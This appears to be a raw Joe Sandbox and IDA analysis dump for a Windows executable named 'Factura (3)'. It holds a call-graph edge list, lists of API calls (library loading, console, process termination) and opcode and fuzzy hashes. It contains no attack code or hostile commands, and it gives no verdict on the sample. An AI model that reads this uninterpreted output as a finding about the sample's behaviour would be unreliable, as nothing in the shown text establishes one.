std::_Locinfo::_Getcvt 8 API calls 19479->19480 19481 7ff7340da166 19480->19481 19481->18643 19621 7ff7340e45d0 19482->19621 19484 7ff7340daa9c Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 19484->18645 19672 7ff7340e1cc0 19485->19672 19487 7ff7340daa3a Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 19487->18647 19688 7ff7340e1a90 19488->19688 19490 7ff7340de4f3 Concurrency::details::WorkQueue::IsStructuredEmpty 19490->18649 19492 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19491->19492 19493 7ff7340da251 19492->19493 19493->18653 19692 7ff7340f24dc 19494->19692 19498 7ff7340dd330 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19497->19498 19499 7ff7340dad30 _Mpunct 49 API calls 19498->19499 19500 7ff7340d9889 19499->19500 19500->18664 19714 7ff7340e1c80 19501->19714 19503 7ff7340da9da Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 19503->18667 19505 7ff7340dcec2 Concurrency::details::WorkQueue::IsStructuredEmpty 19504->19505 19718 7ff7340dcf30 19505->19718 19508 7ff7340e5d70 20094 7ff7340de0d0 19508->20094 19510 7ff7340e5d9a 19516 7ff7340e5dac 19510->19516 20098 7ff7340e5560 19510->20098 19511 7ff7340e5490 49 API calls 19512 7ff7340e5e36 19511->19512 20101 7ff7340de920 19512->20101 19515 7ff7340d99d8 19517 7ff7340e2200 19515->19517 19516->19511 20144 7ff7340e2170 19517->20144 19519 7ff7340e2246 19519->18677 19521 7ff7340e5490 49 API calls 19521->19519 19523 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19522->19523 19524 7ff7340da398 19523->19524 19524->18679 19526 7ff7340daaf5 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19525->19526 19527 7ff7340dab32 Concurrency::details::WorkQueue::IsStructuredEmpty 19526->19527 19528 7ff7340e1bf0 _Mpunct 49 API calls 19526->19528 20158 7ff7340dd3b0 19527->20158 19528->19527 19530 7ff7340dab87 19530->18681 19532 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19531->19532 19533 
7ff7340da46b 19532->19533 19533->18686 19536 7ff7340da683 _Mpunct 19534->19536 19535 7ff7340de0d0 49 API calls 19542 7ff7340da734 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 19535->19542 19536->19535 19537 7ff7340e5490 49 API calls 19538 7ff7340da98d 19537->19538 19539 7ff7340de920 49 API calls 19538->19539 19540 7ff7340d9b67 19539->19540 19544 7ff7340dea80 19540->19544 19541 7ff7340e5560 78 API calls 19543 7ff7340da746 std::ios_base::width Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 19541->19543 19542->19541 19542->19543 19543->19537 19545 7ff7340de0d0 49 API calls 19544->19545 19547 7ff7340deaac 19545->19547 19546 7ff7340e5490 49 API calls 19548 7ff7340dec1c 19546->19548 19552 7ff7340deb05 wcstoxq 19547->19552 20162 7ff7340dcb60 19547->20162 19550 7ff7340de920 49 API calls 19548->19550 19551 7ff7340d9b75 19550->19551 19551->18699 19552->19546 20184 7ff7340de3a0 19553->20184 19555 7ff7340df17c std::bad_exception::~bad_exception 19555->18704 19557 7ff7340d1233 19556->19557 19557->19467 19559 7ff7340dbbee Concurrency::details::WorkQueue::IsStructuredEmpty 19558->19559 19564 7ff7340da570 19559->19564 19561 7ff7340dbc6e 19562 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19561->19562 19563 7ff7340d9714 19562->19563 19563->19479 19565 7ff7340da59f Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure ctype 19564->19565 19567 7ff7340da5d9 ctype shared_ptr 19565->19567 19568 7ff7340dad30 19565->19568 19567->19561 19569 7ff7340dad57 _Mpunct 19568->19569 19571 7ff7340dad63 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19569->19571 19574 7ff7340e1bf0 19569->19574 19573 7ff7340dad9a Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct char_traits 19571->19573 19577 7ff7340dac20 19571->19577 19573->19567 19580 7ff7340e67f8 19574->19580 19597 7ff7340dabf0 19577->19597 19585 7ff7340e6630 19580->19585 19584 7ff7340e681a 19593 7ff7340e8560 19585->19593 19587 7ff7340e6664 19588 7ff7340e8618 
19587->19588 19589 7ff7340e8637 19588->19589 19590 7ff7340e8682 RaiseException 19589->19590 19591 7ff7340e8660 RtlPcToFileHeader 19589->19591 19590->19584 19592 7ff7340e8678 19591->19592 19592->19590 19594 7ff7340e85b6 __std_exception_destroy 19593->19594 19595 7ff7340e8581 19593->19595 19594->19587 19595->19594 19596 7ff7340f7018 std::exception::exception 47 API calls 19595->19596 19596->19594 19600 7ff7340e1c30 19597->19600 19601 7ff7340e1c48 allocator 19600->19601 19604 7ff7340dabb0 19601->19604 19605 7ff7340dabc4 19604->19605 19606 7ff7340dabd0 19604->19606 19610 7ff7340dac80 19605->19610 19608 7ff7340dabce 19606->19608 19618 7ff7340df840 19606->19618 19608->19573 19611 7ff7340daca3 19610->19611 19612 7ff7340daca8 19610->19612 19613 7ff7340e1950 Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 19611->19613 19614 7ff7340df840 _Allocate RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 19612->19614 19613->19612 19616 7ff7340dacb2 19614->19616 19615 7ff7340ee39c _invalid_parameter_noinfo_noreturn 47 API calls 19615->19616 19616->19615 19617 7ff7340dacd2 19616->19617 19617->19608 19619 7ff7340e7648 std::_Facet_Register RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 19618->19619 19620 7ff7340df853 19619->19620 19620->19608 19622 7ff7340e45ed Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19621->19622 19625 7ff7340e43a0 19622->19625 19624 7ff7340e460c 19624->19484 19630 7ff7340df990 19625->19630 19629 7ff7340e4416 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19629->19624 19631 7ff7340df9b3 19630->19631 19632 7ff7340df9ae 19630->19632 19631->19629 19634 7ff7340dc490 19631->19634 19642 7ff7340e1c10 19632->19642 19635 7ff7340dc4d3 _Mpunct 19634->19635 19636 7ff7340e1bf0 _Mpunct 49 API calls 19635->19636 19637 7ff7340dc4e7 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19635->19637 19636->19637 19638 7ff7340dac20 _Mpunct 49 API calls 19637->19638 19640 7ff7340dc545 
Concurrency::details::WorkQueue::IsStructuredEmpty 19638->19640 19639 7ff7340dc5f9 _Mpunct 19639->19629 19640->19639 19653 7ff7340dfa00 19640->19653 19645 7ff7340e681c 19642->19645 19650 7ff7340e66f0 19645->19650 19648 7ff7340e8618 std::ios_base::clear 2 API calls 19649 7ff7340e683e 19648->19649 19651 7ff7340e8560 std::exception::exception 47 API calls 19650->19651 19652 7ff7340e6724 19651->19652 19652->19648 19656 7ff7340e2290 19653->19656 19659 7ff7340db1f0 19656->19659 19658 7ff7340dfa2d 19658->19639 19660 7ff7340db209 19659->19660 19661 7ff7340db218 19659->19661 19663 7ff7340df7a0 19660->19663 19661->19658 19664 7ff7340df804 19663->19664 19666 7ff7340df827 19664->19666 19667 7ff7340ee39c 19664->19667 19666->19661 19668 7ff7340ee214 _invalid_parameter_noinfo 47 API calls 19667->19668 19669 7ff7340ee3b5 19668->19669 19670 7ff7340ee3cc _invalid_parameter_noinfo_noreturn 17 API calls 19669->19670 19671 7ff7340ee3ca 19670->19671 19673 7ff7340e1cd8 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19672->19673 19676 7ff7340e1d00 19673->19676 19675 7ff7340e1cf2 19675->19487 19677 7ff7340e1dbf 19676->19677 19679 7ff7340e1d3e Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct char_traits 19676->19679 19680 7ff7340dbf20 19677->19680 19679->19675 19681 7ff7340dbf63 _Mpunct 19680->19681 19682 7ff7340e1bf0 _Mpunct 49 API calls 19681->19682 19683 7ff7340dbf77 Concurrency::details::WorkQueue::IsStructuredEmpty _Mpunct 19681->19683 19682->19683 19684 7ff7340dac20 _Mpunct 49 API calls 19683->19684 19686 7ff7340dbfd5 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 19684->19686 19685 7ff7340dc076 std::ios_base::failure::failure _Mpunct 19685->19679 19686->19685 19687 7ff7340dfa00 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 19686->19687 19687->19685 19690 7ff7340e1aad Concurrency::details::WorkQueue::IsStructuredEmpty 19688->19690 19689 7ff7340e1b09 char_traits 19689->19490 19690->19689 19691 
7ff7340dfa00 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 19690->19691 19691->19689 19713 7ff7340f276c EnterCriticalSection 19692->19713 19694 7ff7340f2508 19695 7ff7340f2510 19694->19695 19698 7ff7340f2533 19694->19698 19696 7ff7340f3518 memcpy_s 11 API calls 19695->19696 19697 7ff7340f2515 19696->19697 19699 7ff7340ee37c _invalid_parameter_noinfo 47 API calls 19697->19699 19700 7ff7340f25d0 73 API calls 19698->19700 19708 7ff7340f2521 19699->19708 19703 7ff7340f253b 19700->19703 19701 7ff7340f27c0 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 19702 7ff7340d980d 19701->19702 19702->18656 19702->18660 19704 7ff7340f2579 19703->19704 19705 7ff7340f2569 19703->19705 19703->19708 19707 7ff7340f7018 std::exception::exception 47 API calls 19704->19707 19706 7ff7340f3518 memcpy_s 11 API calls 19705->19706 19706->19708 19709 7ff7340f2587 19707->19709 19708->19701 19709->19708 19710 7ff7340f25ba 19709->19710 19711 7ff7340ee3cc _invalid_parameter_noinfo_noreturn 17 API calls 19710->19711 19712 7ff7340f25ce 19711->19712 19715 7ff7340e1c9b Concurrency::details::WorkQueue::IsStructuredEmpty 19714->19715 19716 7ff7340e1d00 std::ios_base::failure::failure 49 API calls 19715->19716 19717 7ff7340e1cb1 19716->19717 19717->19503 19719 7ff7340dcf57 Concurrency::details::WorkQueue::IsStructuredEmpty 19718->19719 19728 7ff7340dd060 19719->19728 19725 7ff7340dd021 19726 7ff7340d99ba 19725->19726 19745 7ff7340e5490 19725->19745 19726->19508 19729 7ff7340dd087 19728->19729 19749 7ff7340e41e0 19729->19749 19732 7ff7340dce10 19920 7ff7340dd130 19732->19920 19734 7ff7340dce23 19925 7ff7340e06f0 19734->19925 19736 7ff7340dce41 19737 7ff7340e4870 19736->19737 19738 7ff7340e489b 19737->19738 19744 7ff7340e4897 wcstoxq 19737->19744 19935 7ff7340e7234 19738->19935 19741 7ff7340e06f0 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 47 API calls 19742 7ff7340e48d4 19741->19742 19943 7ff7340dc940 19742->19943 19744->19725 19746 
7ff7340e54ac std::ios_base::good 19745->19746 20090 7ff7340e1ff0 19746->20090 19758 7ff7340e0b50 19749->19758 19753 7ff7340e4224 19754 7ff7340e424a 19753->19754 19756 7ff7340e5490 49 API calls 19753->19756 19755 7ff7340dcfa9 19754->19755 19769 7ff7340e70c4 19754->19769 19755->19732 19756->19754 19774 7ff7340e2050 19758->19774 19763 7ff7340e0bec 19765 7ff7340e5c50 19763->19765 19766 7ff7340e5c6c 19765->19766 19849 7ff7340dca50 19766->19849 19768 7ff7340e5c85 wcstoxq ctype 19768->19753 19770 7ff7340e6520 std::_Lockit::_Lockit 6 API calls 19769->19770 19771 7ff7340e70dc 19770->19771 19772 7ff7340e6598 std::_Lockit::~_Lockit LeaveCriticalSection 19771->19772 19773 7ff7340e7135 19772->19773 19773->19755 19789 7ff7340e2080 19774->19789 19777 7ff7340e7648 19778 7ff7340e7653 19777->19778 19779 7ff7340e0bd5 19778->19779 19780 7ff7340f4214 std::_Facet_Register 2 API calls 19778->19780 19781 7ff7340e7672 19778->19781 19779->19763 19786 7ff7340de020 19779->19786 19780->19778 19782 7ff7340e767d 19781->19782 19809 7ff7340e67d8 19781->19809 19813 7ff7340e7eb0 19782->19813 19817 7ff7340e6a28 19786->19817 19790 7ff7340e0bcb 19789->19790 19791 7ff7340e20da 19789->19791 19790->19777 19792 7ff7340e8618 std::ios_base::clear 2 API calls 19791->19792 19793 7ff7340e20ef std::make_error_code 19791->19793 19792->19793 19797 7ff7340ddec0 19793->19797 19796 7ff7340e8618 std::ios_base::clear 2 API calls 19796->19790 19800 7ff7340de1e0 19797->19800 19801 7ff7340dd310 _Mpunct 49 API calls 19800->19801 19802 7ff7340de216 19801->19802 19803 7ff7340dd990 std::ios_base::failure::failure 49 API calls 19802->19803 19804 7ff7340de245 19803->19804 19805 7ff7340de4e0 Concurrency::details::ResourceManager::CreateNodeTopology 47 API calls 19804->19805 19806 7ff7340de250 19805->19806 19807 7ff7340e7a40 std::_Locinfo::_Getcvt 8 API calls 19806->19807 19808 7ff7340ddefd 19807->19808 19808->19796 19810 7ff7340e67e6 std::bad_alloc::bad_alloc 19809->19810 19811 7ff7340e8618 std::ios_base::clear 2 API calls 
19810->19811 19812 7ff7340e67f7 19811->19812 19814 7ff7340e7ebe stdext::threads::lock_error::lock_error 19813->19814 19815 7ff7340e8618 std::ios_base::clear 2 API calls 19814->19815 19816 7ff7340e7ecf 19815->19816 19826 7ff7340e6520 19817->19826 19819 7ff7340e6a4a 19825 7ff7340e6a6d __std_exception_destroy BuildCatchObjectHelperInternal 19819->19825 19830 7ff7340e6c20 19819->19830 19822 7ff7340e6a62 19833 7ff7340e6c50 19822->19833 19823 7ff7340de030 19823->19763 19837 7ff7340e6598 19825->19837 19827 7ff7340e652f 19826->19827 19828 7ff7340e6534 19826->19828 19841 7ff7340f27dc 19827->19841 19828->19819 19831 7ff7340e7648 std::_Facet_Register 4 API calls 19830->19831 19832 7ff7340e6c32 std::ios_base::_Init 19831->19832 19832->19822 19834 7ff7340e6c75 19833->19834 19835 7ff7340e6c62 19833->19835 19834->19825 19844 7ff7340e7314 19835->19844 19838 7ff7340e65a3 LeaveCriticalSection 19837->19838 19840 7ff7340e65ac 19837->19840 19840->19823 19842 7ff7340f89a0 std::_Locinfo::_Locinfo_ctor 5 API calls 19841->19842 19843 7ff7340f27e5 EnterCriticalSection 19842->19843 19845 7ff7340e7322 EncodePointer 19844->19845 19846 7ff7340e7349 19844->19846 19845->19834 19847 7ff7340f3bdc BuildCatchObjectHelperInternal 47 API calls 19846->19847 19848 7ff7340e734e 19847->19848 19850 7ff7340e6520 std::_Lockit::_Lockit 6 API calls 19849->19850 19851 7ff7340dca65 19850->19851 19863 7ff7340dedc0 19851->19863 19853 7ff7340dca7e std::locale::_Getfacet 19862 7ff7340dcaab 19853->19862 19869 7ff7340dffb0 19853->19869 19854 7ff7340e6598 std::_Lockit::~_Lockit LeaveCriticalSection 19856 7ff7340dcb47 19854->19856 19856->19768 19858 7ff7340dcad4 19883 7ff7340e69e8 19858->19883 19859 7ff7340dcacc 19879 7ff7340e1980 19859->19879 19862->19854 19864 7ff7340dedd4 19863->19864 19865 7ff7340dee12 19863->19865 19866 7ff7340e6520 std::_Lockit::_Lockit 6 API calls 19864->19866 19865->19853 19867 7ff7340dede0 19866->19867 19868 7ff7340e6598 std::_Lockit::~_Lockit LeaveCriticalSection 19867->19868 19868->19865 19870 

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                      • String ID:
                                                      • API String ID: 1617910340-0
                                                      • Opcode ID: 4e59b6a3bcf81a286121f2dea03035ec71c8f623c03c3a2726caf4022269a2f0
                                                      • Instruction ID: dd2ec67b62ec3b42660a414c23fedf0f981771a27fe71a08c676d07fac298f84
                                                      • Opcode Fuzzy Hash: 4e59b6a3bcf81a286121f2dea03035ec71c8f623c03c3a2726caf4022269a2f0
                                                      • Instruction Fuzzy Hash: C1C1D033B28E4295EB18EFA6E4D42AC7761E749BA8F514235DA2E97394CF38E011D710

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressProc$Concurrency::details::EmptyQueue::StructuredWork$CallConsoleCreateErrorFreeFunction0HandleLastMemberModuleProcessstd::bad_exception::~bad_exception
                                                      • String ID: h
                                                      • API String ID: 2797511836-2439710439
                                                      • Opcode ID: 3fe42faaf75b140fe51262ce875f1b0c46b9b7e78531efefefb824384dd147ab
                                                      • Instruction ID: 8fd268e77b22e0e6e2a2a2da090860822614af6cbdc73752348fdd65a6329a39
                                                      • Opcode Fuzzy Hash: 3fe42faaf75b140fe51262ce875f1b0c46b9b7e78531efefefb824384dd147ab
                                                      • Instruction Fuzzy Hash: B1024C32709AC6A1DA64EB56E4903EBF3A1FBC5780F804435D68D83B99EE7CD148DB50

                                                      Control-flow Graph

                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7340F89C0,?,?,?,?,00007FF7340F27E5,?,?,?,?,00007FF7340E6534), ref: 00007FF7340F8348
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF7340F89C0,?,?,?,?,00007FF7340F27E5,?,?,?,?,00007FF7340E6534), ref: 00007FF7340F8354
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: api-ms-$ext-ms-
                                                      • API String ID: 3013587201-537541572
                                                      • Opcode ID: 3b0c198edbfeba13af139ee6d5da1187995b31040557d0efa468b4099af4e768
                                                      • Instruction ID: 95ae299442b619096826599d2fa7a8c925bfda69c114602556816a4c13031ed7
                                                      • Opcode Fuzzy Hash: 3b0c198edbfeba13af139ee6d5da1187995b31040557d0efa468b4099af4e768
                                                      • Instruction Fuzzy Hash: 0B41E122B1AE02A1EA5DAF17A8C45B9A2D1BF05BE0F895135DD0DD7794EF3CE405A320

                                                      Control-flow Graph

                                                      APIs
                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FF734108D09), ref: 00007FF7340F9EF8
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00007FF734108D09), ref: 00007FF7340F9F83
                                                      Similarity
                                                      • API ID: ConsoleErrorLastMode
                                                      • String ID:
                                                      • API String ID: 953036326-0
                                                      • Opcode ID: 2151d4ce3eec4ed79f378546bdaaa0655b0e1ed4ee55494e16d1ab3d04857c73
                                                      • Instruction ID: cb4b739c0dc9433e5c3e66dd4ef832fba52778dec1ec917fd11ea6907412e7f9
                                                      • Opcode Fuzzy Hash: 2151d4ce3eec4ed79f378546bdaaa0655b0e1ed4ee55494e16d1ab3d04857c73
                                                      • Instruction Fuzzy Hash: 0C911632F09651A5F758AF6694C02BDABE0FB44B88F940179DE4EA3684CF3CD445EB20

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: String
                                                      • String ID: LCMapStringEx
                                                      • API String ID: 2568140703-3893581201
                                                      • Opcode ID: 0779eb7b2c8fc791242d77480640b29f5f904a4d28405e433465b3ad06adad93
                                                      • Instruction ID: dc6db93d51e40cdf9bdba52b10c179d01e19cea2b05b88dbbde52aa40a8eb5fe
                                                      • Opcode Fuzzy Hash: 0779eb7b2c8fc791242d77480640b29f5f904a4d28405e433465b3ad06adad93
                                                      • Instruction Fuzzy Hash: 15214F36B08B8196D764DF16B48029AF7A4FB88BC0F944136EE8D83B19DF3CD4508B00

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID:
                                                      • API String ID: 1703294689-0
                                                      • Opcode ID: eddd917cfcc4647a87df738ea11f378e0bdf5e155613cf48a3517cfcac9b31cc
                                                      • Instruction ID: b8abdaaf794c2768783b72066aaeca8962fc43ba41e8d4fd683550bd619a8ac3
                                                      • Opcode Fuzzy Hash: eddd917cfcc4647a87df738ea11f378e0bdf5e155613cf48a3517cfcac9b31cc
                                                      • Instruction Fuzzy Hash: 58D01724B0AB02A2EA0C7F7268C803892511FA8B00B901478C80A82393ED3CA44DAA22

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: 2b0004135f5c55f3b752ccc70fa7117fa448ae8c819cd30d1aa712bcf1a2d8bb
                                                      • Instruction ID: 2246f3003ab7c4d490ca7c77a40cacd5fc3e51149e537559b22c99e546af935c
                                                      • Opcode Fuzzy Hash: 2b0004135f5c55f3b752ccc70fa7117fa448ae8c819cd30d1aa712bcf1a2d8bb
                                                      • Instruction Fuzzy Hash: 1851D332A1CAC19AE7249F25F0883AEBBA1F789344FA40136D78D83A85CF7CD145DB51

                                                      Control-flow Graph

                                                      control_flow_graph: basic blocks 356-422 covering 7ff734100acc-7ff734100d88 (graph legend marks executed vs. not-executed blocks; calls IsValidCodePage and GetCPInfo); edge list omitted
                                                      APIs
                                                        • Part of subcall function 00007FF734100428: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF734100764), ref: 00007FF734100452
                                                      • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,00000000,00007FF734100895), ref: 00007FF734100B39
                                                      • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,00000000,00007FF734100895), ref: 00007FF734100B7D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      • Opcode ID: aaaa9abd8e278295d9640a6c5dd9acf2b596e7c1232e680b79df1a6f9e04eaf7
                                                      • Instruction ID: 64fff4a116e6c40432e1c2fc3a935be87c8c274ac8bdd7babf0fb4b1eccc6788
                                                      • Opcode Fuzzy Hash: aaaa9abd8e278295d9640a6c5dd9acf2b596e7c1232e680b79df1a6f9e04eaf7
                                                      • Instruction Fuzzy Hash: 5281F862A0DE8262E76CAF17B4C8179FBA1EB44740FE84035C64D87691DE3DF541E322

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: __scrt_acquire_startup_lock__scrt_release_startup_lock
                                                      • String ID:
                                                      • API String ID: 3055961719-0
                                                      • Opcode ID: c50e6158f62ff9f6ac30a2827272fbd418e74a549cd29a9f3f65d07e7d535c3e
                                                      • Instruction ID: 2f2e62498acccd4b57013900c7ed4126e7297add7cce56b0cbbca749435b1244
                                                      • Opcode Fuzzy Hash: c50e6158f62ff9f6ac30a2827272fbd418e74a549cd29a9f3f65d07e7d535c3e
                                                      • Instruction Fuzzy Hash: 9831A211B1DA4B61FA1CBF2794D13B9E290AF85744FC440B8EA0DC72D3DE2CA495E635

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: FileHandleType
                                                      • String ID:
                                                      • API String ID: 3000768030-0
                                                      • Opcode ID: 8cea16ebbd8e8f1e046f15cb459bd5c104da91dfe81497d9640ccb44d3a8aa50
                                                      • Instruction ID: ddb60052b938933a43ac53d68f4fdbdc6253e6ed59a278c107229d74988700af
                                                      • Opcode Fuzzy Hash: 8cea16ebbd8e8f1e046f15cb459bd5c104da91dfe81497d9640ccb44d3a8aa50
                                                      • Instruction Fuzzy Hash: 7E319622B19B46A1D7289F1694D41B8B790FB45BA0BA81375D75E873E0CF38E461E310

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.1642782328.00007FF7340D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7340D0000, based on PE: true
                                                      • Associated: 00000006.00000002.1642768349.00007FF7340D0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642812667.00007FF73410C000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642831106.00007FF73411D000.00000008.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642850127.00007FF734131000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000006.00000002.1642865325.00007FF734135000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff7340d0000_Factura (3).jbxd
                                                      Similarity
                                                      • API ID: ChangeCloseErrorFindLastNotification
                                                      • String ID:
                                                      • API String ID: 1687624791-0
                                                      • Opcode ID: f8434339c19f2d8af26b20d235332346ca5eeaaf1a141028fab64d603f10938a
                                                      • Instruction ID: e07405e0d237cebf93dcb2268959a67997325b274c89c8ceb4f7a41edc734956
                                                      • Opcode Fuzzy Hash: f8434339c19f2d8af26b20d235332346ca5eeaaf1a141028fab64d603f10938a
                                                      • Instruction Fuzzy Hash: 4521D420F09A8260EA9C7F23B4C82B892D16F847A4F984275DA5DC73D6DE6CA444A721

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
